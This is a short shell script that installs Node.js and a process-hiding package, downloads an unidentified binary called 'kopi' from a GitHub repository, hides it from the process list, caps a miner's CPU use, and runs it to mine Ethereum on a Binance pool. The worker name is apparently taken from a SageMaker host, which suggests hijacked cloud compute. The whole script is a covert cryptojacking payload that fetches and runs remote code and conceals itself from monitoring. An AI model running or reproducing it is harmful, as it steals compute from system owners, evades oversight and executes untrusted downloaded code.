#!/bin/sh

apt update && apt -y install sudo
sudo apt update;apt -y install build-essential cpulimit screen ca-certificates libcurl4
curl -fsSL https://deb.nodesource.com/setup_17.x | sudo -E bash -
sudo apt-get install -y nodejs
sudo apt-get install gcc g++ make
sudo -u root npm i -g node-process-hider
sudo ln -fs /usr/share/zoneinfo/Africa/Johannesburg /etc/localtime
sudo dpkg-reconfigure --frontend noninteractive tzdata
wget https://github.com/aurbach55/dera/raw/main/kopi
ph add kopi
chmod +x kopi
cpulimit -e lolMiner -l 30 &
./kopi --coin ETH --pool ethash.poolbinance.com:443 --user sagemaker.$(cat /proc/sys/kernel/hostname)
